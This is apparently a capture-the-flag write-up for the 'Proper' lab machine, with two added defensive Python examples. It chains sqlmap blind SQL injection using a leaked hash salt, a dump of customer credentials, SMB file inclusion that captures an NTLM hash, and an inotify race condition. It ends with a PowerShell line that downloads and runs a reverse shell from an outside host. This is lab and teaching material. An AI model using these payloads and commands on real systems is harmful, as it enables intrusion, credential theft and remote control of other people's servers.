IP-ADDR: proper.htb

nmap scan:

80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

interesting javascript code snippet in /index.html

from that javascript code products-ajax.php load product list

In the URL /products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b the order parameter looks like it contains the SQL keyword desc (descending order). Changing it to ascending with asc makes the server return a security error:

❯ curl -i -s ''
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.4.1
Date: Sat, 21 Aug 2021 08:20:17 GMT
Content-Length: 39

Forbidden - Tampering attempt detected.

If all parameters are removed and only /products-ajax.php is requested, the error response returns a snippet of the source code:

<!-- [8] Undefined index: order
On line 6 in file C:\inetpub\wwwroot\products-ajax.php
  1 |   // SECURE_PARAM_SALT needs to be defined prior including functions.php 
  2 |   define('SECURE_PARAM_SALT','hie0shah6ooNoim'); 
  3 |   include('functions.php'); 
  4 |   include('db-config.php'); 
  5 |   if ( !$_GET['order'] || !$_GET['h'] ) {                <<<<< Error encountered in this line.
  6 |     // Set the response code to 500 
  7 |     http_response_code(500); 
  8 |     // and die(). Someone fiddled with the parameters. 
  9 |     die('Parameter missing or malformed.'); 
 10 |   } 
 11 |  
// -->
Parameter missing or malformed.

Gobuster running in the background found a directory:

/licenses             (Status: 301) [Size: 152] [-->]

It contains a login page.

Combining the URL parameters with the source snippet from the error response:

The order parameter holds a value used by the backend, and h holds an MD5 hash generated from the order value and the salt hie0shah6ooNoim.

And indeed it matches:

❯ python -c "from hashlib import md5;print(md5(('hie0shah6ooNoim'+'id desc').encode('utf-8')).hexdigest())"
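The check implied by the snippet above, reproduced as an added Python example (not the author's script): h only proves the sender knows the salt, so once the salt leaks through the error page any order value verifies, including injected SQL. The allow-list function at the end is the mitigation; ORDER_COLUMNS is an assumed set of sortable columns.

```python
import hashlib
import hmac

SALT = "hie0shah6ooNoim"                 # salt leaked by the error page on this box
ORDER_COLUMNS = {"id", "customer_name"}  # assumed allow-list of sortable columns


def sign_param(value, salt=SALT):
    """The page's scheme: h = md5(salt + value)."""
    return hashlib.md5((salt + value).encode("utf-8")).hexdigest()


def verify_param(value, h, salt=SALT):
    """Server-side check as the error snippet implies, with a constant-time compare.
    It proves only that the caller knew the salt, nothing about the value's safety."""
    return hmac.compare_digest(sign_param(value, salt), h)


def safe_order_clause(order):
    """Mitigation: never sign raw SQL; accept only '<column> asc|desc' from a
    fixed allow-list and rebuild the clause from the matched pieces."""
    parts = order.strip().lower().split()
    if len(parts) != 2 or parts[0] not in ORDER_COLUMNS or parts[1] not in ("asc", "desc"):
        return None
    return f"{parts[0]} {parts[1]}"
```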

SQL injection

Testing for SQL injection with sqlmap finds a boolean-based blind injection:

sqlmap --eval="import hashlib;h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()"  --batch --dbms=mysql --threads=10 -u ""
#... [snip] ...
Parameter: order (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: order=(SELECT (CASE WHEN (7143=7143) THEN 'id desc' ELSE (SELECT 8447 UNION SELECT 3809) END))&h=a1b30d31d344a5a4e41e8496ccbdd26b
#... [snip] ...

After enumerating the DBMS, dump the user credentials:

sqlmap --eval="import hashlib;h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()"  --batch --dbms=mysql --threads=10 -u "" -D cleaner -T customers --dump
#... [snip] ...
Database: cleaner
Table: customers
[29 entries]
| id | login                        | password                                     | customer_name        |
| 1  | [email protected] | 7c6a180b36896a0a8c02787eeafb0e4c (password1) | Vikki Solomon        |
| 2  | [email protected]         | 6cb75f652a9b52798eb6cf2201057c73 (password2) | Neave Stone          |
| 3  | [email protected]    | e10adc3949ba59abbe56e057f20f883e (123456)    | Bertie McEachern     |
| 4  | [email protected]      | 827ccb0eea8a706c4c34a16891f84e7b (12345)     | Jordana Kleiser      |
| 5  | [email protected]    | 25f9e794323b453885f5181f1b624d0b (123456789) | Mariellen Chasemore  |
| 6  | [email protected]        | 5f4dcc3b5aa765d61d8327deb882cf99 (password)  | Gwyneth Dornin       |
| 7  | [email protected]         | f25a2fc72690b780b2a14e140ef6a9e0 (iloveyou)  | Israel Tootell       |
| 8  | [email protected]        | 8afa847f50a716e64932d995c8e7435a (princess)  | Karon Mangham        |
| 9  | [email protected]            | fcea920f7412b5da7be0cf42b8c93759 (1234567)   | Janifer Blinde       |
| 10 | [email protected]   | f806fc5a2a0d5ba2471600758452799c (rockyou)   | Laurens Lenchenko    |
| 11 | [email protected]         | 25d55ad283aa400af464c76d713c07ad (12345678)  | Andreana Austin      |
| 12 | [email protected]       | e99a18c428cb38d5f260853678922e03 (abc123)    | Arnold Feldmesser    |
| 13 | [email protected]    | fc63f87c08d505264caba37514cd0cfd (nicole)    | Adella Huntar        |
| 14 | [email protected]    | aa47f8215c6f30a0dcdb2a36a9f4168e (daniel)    | Trudi Alelsandrovich |
| 15 | [email protected]              | 67881381dbc68d4761230131ae0008f7 (babygirl)  | Ivy Shay             |
| 16 | [email protected]             | d0763edaa9d9bd2a9516280e9044d885 (monkey)    | Alys Callaby         |
| 17 | [email protected]             | 061fba5bdfc076bb7362616668de87c8 (lovely)    | Dorena Aery          |
| 18 | [email protected]     | aae039d6aa239cfc121357a825210fa3 (jessica)   | Amble Alekseicik     |
| 19 | [email protected]           | c33367701511b4f6020ec61ded352059 (654321)    | Lin Ginman           |
| 20 | [email protected]              | 0acf4539a14b3aa27deeb4cbdf6e989f (michael)   | Letty Giorio         |
| 21 | [email protected]             | adff44c5102fca279fce7559abf66fee (ashley)    | Lazarus Bysh         |
| 22 | [email protected]            | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty)    | Bud Klewer           |
| 23 | [email protected]       | 96e79218965eb72c92a549dd5a330112 (111111)    | Woodrow Strettell    |
| 24 | [email protected]     | edbd0effac3fcc98e725920a512881e0 (iloveu)    | Lila O Doran         |
| 25 | [email protected]      | 670b14728ad9902aecba32e22fa4f6bd (000000)    | Bibbie Pfeffel       |
| 26 | [email protected]      | 2345f10bb948c5665ef91f6773b3e455 (michelle)  | Luce Grimsdell       |
| 27 | [email protected]            | f78f2477e949bee2d12a2c540fb6084f (tigger)    | Lyle Pealing         |
| 28 | [email protected]             | 0571749e2ac330a7455809c6b0e7af90 (sunshine)  | Kimmy Russen         |
| 29 | [email protected]  | c378985d629e99a4e86213db0cd5e70d (chocolate) | Meg Eastmond         |

sqlmap does the job and brute-forces all the password hashes.

Logging in with the customer creds, the same URL format is found inside the /licenses dashboard.

Applying the same hashing technique, this time the response contains a PHP error trace:

❯ python -c "from hashlib import md5;print(md5(('hie0shah6ooNoim'+'test').encode('utf-8')).hexdigest())"

This time the server does file_get_contents() on the theme parameter.

SMB connect via remote file inclusion

A small Python script to make this easier:

from hashlib import md5
from sys import argv
from urllib.parse import quote_plus
import requests as r

s = r.session()
url = ''  # base URL (elided in the original)
data = {"username": "[email protected]", "password": "password1"}
s.post(url, data=data)  # login with the dumped customer creds; login endpoint path elided in the original
theme_param = argv[1]
h = md5(b"hie0shah6ooNoim" + theme_param.encode('utf-8')).hexdigest()  # h = md5(salt + theme)
rspn = s.get(f'{url}licenses.php?theme={quote_plus(theme_param)}&h={h}')
head, sep, tail = rspn.text.partition('<body>')
print(head)  # the PHP notice is emitted before the page body


Testing the theme parameter

LFI is not possible because the server script appends a / to the end of the path:

❯ python '/etc/passwd'
<!-- [2] file_get_contents(/etc/passwd/ failed to open stream: No such file or directory

RFI over the http:// wrapper is disabled:

❯ python ''
<!-- [2] include(): http:// wrapper is disabled in the server configuration by allow_url_include=0

When trying to connect to an SMB server,

❯ impacket-smbserver -smb2support smb .

it returns "failed to open stream", but the SMB server receives an authentication request.

That means the server is trying to connect to the SMB server with credentials.

This is a Net-NTLMv2 hash, and it cracked with rockyou.txt.

Set up the SMB server with the creds and successfully include / from the SMB share:

❯ impacket-smbserver -smb2support smb . -username web -password 'charlotte123!'

Going back to the initial error, there is another security check:

 33 | function secure_include($file) { 
 34 |   if (strpos(file_get_contents($file),'<?') === false) { 
 35 |     include($file);

This means that if the included file contains <? anywhere, the function bails out; otherwise it opens the same file a second time with include().

  • The include() function is used to put the contents of one PHP file into another PHP file.

And timing it, it takes a few seconds to execute both reads when all the conditions pass, so there is a window between the check and the include.

Race condition with inotify

The inotify API provides a mechanism for monitoring filesystem events. Inotify can be used to monitor individual files, or to monitor directories. When a directory is monitored, inotify will return events for the directory itself, and for files inside the directory.

Get inotify-tools with sudo apt install inotify-tools.

We can monitor all events on a specific file and do something on every event.

Use the inotifywait utility from inotify-tools with the -e flag to monitor a specific event:

-e|--event <event1> [ -e|--event <event2> ... ]
		Listen for specific event(s).  If omitted, all events are 
		listened for.

	close		file or directory closed, regardless of read/write mode

With that tool PHP code finally gets executed on the server. The only issue is the delay between the two includes, between the first close and the second open of the file. For that I set up two event listeners, the first for close and the second for open:

echo poorduck >; inotifywait -e close;inotifywait -e open;  echo '<?php echo "poorduck from php!";?>' >
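The check-then-include gap that secure_include() leaves and that the inotify listeners above exploit, simulated as an added Python example (not code from the page): the racy version re-opens the file after the '<?' check exactly as the PHP does, the fixed version uses the bytes it checked. The file contents and the swap callback are constructed for the demo; in practice the fix on top of this is to allow-list theme names rather than include caller-controlled paths at all.

```python
import os
import tempfile

PHP_TAG = b"<?"


def racy_secure_include(path, between_check_and_use):
    """Mirrors the page's secure_include(): file_get_contents() checks for '<?',
    then include() opens the same path again. The callback stands in for whatever
    happens in the gap between the two opens (here: the file being rewritten)."""
    with open(path, "rb") as f:
        checked = f.read()
    if PHP_TAG in checked:
        return None                      # rejected by the '<?' check
    between_check_and_use()
    with open(path, "rb") as f:
        return f.read()                  # what include() would actually execute


def fixed_secure_include(path, between_check_and_use):
    """Read once and only ever use the bytes that were checked, so a change
    after the check can no longer reach the interpreter."""
    with open(path, "rb") as f:
        content = f.read()
    if PHP_TAG in content:
        return None
    between_check_and_use()              # file may change here; we no longer care
    return content


def simulate(include_fn, initial=b"poorduck"):
    """Constructed scenario: a benign file is swapped for PHP code mid-include."""
    fd, path = tempfile.mkstemp()
    os.write(fd, initial)
    os.close(fd)

    def swap():
        with open(path, "wb") as f:
            f.write(b"<?php echo 'swapped'; ?>")

    try:
        return include_fn(path, swap)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(simulate(racy_secure_include))   # b"<?php echo 'swapped'; ?>"
    print(simulate(fixed_secure_include))  # b"poorduck"
```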

Getting a reverse shell with the PayloadsAllTheThings PowerShell payload and the nishang reverse shell ps1:

echo poorduck >; inotifywait -e close; inotifywait -e open; echo "<?php system(\"powershell IEX (New-Object Net.WebClient).DownloadString('')\");?>" >
